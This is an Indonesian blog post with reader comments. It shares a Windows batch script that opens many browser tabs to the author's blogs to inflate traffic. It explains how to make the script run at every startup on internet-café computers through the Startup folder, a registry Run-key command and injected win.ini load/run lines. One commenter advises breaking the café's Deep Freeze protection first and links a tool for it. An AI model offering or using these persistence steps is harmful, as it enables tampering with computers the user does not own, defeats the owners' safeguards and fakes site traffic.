Posts Subscribe comment Comments

SAMPLE



Thanks For

Naikin Traffic Blogmu -cara stress tapi lumayan-

nih mau iseng share cara stree tapi lumayan wat lucu lucuan dan menghibur diri sendiri dan nampang ke temen.
khusus bagi pengguna blogspot mungkin bisa langsung keliatan efeknya..

ini scriptnya dalam bentuk batch file (*.bat)
scriptnya seperti ini

@ECHO OFF
REM Buka url dalam TAB berbeda di firefox
REM lumayan buat bikin blog or web kita autoview ama orang
REM tentunya butuh kerja keras dengan iseng di warnet orang
SET BROWSER=firefox.exe
SET WAIT_TIME=5
START %BROWSER% -new-tab "snutz.us"
@ping 127.0.0.1 -n %WAIT_TIME% -w 1000 > nul
START %BROWSER% -new-tab "facebook.com."
START %BROWSER% -new-tab "tutorialisme.com"
START %BROWSER% -new-tab "tutorialbasket.blogspot.com"
START %BROWSER% -new-tab "thumblerone.blogspot.com"


bikin script diatas menggunakan notepad, wordpad, dll terserah.
lalu save as dalam bentuk *.bat (misal tests.bat)
fungsi dari batch file itu adalah untuk supaya setiap itu komputer or PC log on.. langsung buka firefox dengan banyak tab dan semuanya tab website or blog kita (daripada set default homepage di firefox yang cm ke buka 1 tab??)

nah gmana biar itu batch file ter eksekusi setiap windows start?? (warnet related)
Cara 1
1. taruh file batch tersebut di dalam komputer client misal drive D, C, erserah
2. klik kanan.. create shortcut...
3. copy shortcut yang di create...
4. paste shortcut tadi ke START-ALL PROGRAMS-STARTUP... DONE

Cara 2
bisa pakek software macam regcleaner, tweakXP, dll.. biar masukin file tersebut dalam startup.

Cara 3.
bikin line command scrip tambahan di file bat tadi bentuknya seperti ini
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v tests /t REG_SZ /d %systemroot%\NAMA FILE.bat /f > nul 
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\NAMA FILE.bat >> %systemroot%\win.ini 
echo run=%systemroot%\NAMA FILE.bat >> %systemroot%\win.ini 


mao coba gmana bentuk batch filenya bisa coba Download Ini

untuk trick lainnya terkait blog dan iseng iseng.. bisa check disini

3

AriE ONly nyarios ... :

wkwkwkwkww..... mantab gan tp yg ada ntar usernya malah maki2 lagi, blm apa2 udah terlalu bnyk buka tab.. mantab dah.... ^_^

oy, klo warnetnya pake deprez atau shadow defence gmn tu ?? kan sia2 yg kita buat klo di restart ilang lagi semua...

Priagoenks nyarios ... :

lah itu yg mau sy tanyain. sekarang kan kebanyakan warnet atau PC udah diselimutin sm deep freeze. gmn tuh kalo caranya kayak gitu?

shunichie Alfarishie nyarios ... :

@Arie Only & Priagoenks: bobol deepreeznya dulu sob... habis itu bikin dh tuh cara yg di atas,,, nah habis itu kan kluar tab tab tab tab tab... hehhehe... baru pasng lagi deepreesss nya ?

jadi pas orang lain buka di mozila kluar dh.... blog kita,,

nh buat download undeppreez nya http://shunichie.blogspot.com/2011/01/undeep-freeze-version-70.html


selamat mencoba....

Silahkan Tulis Komentar Anda ...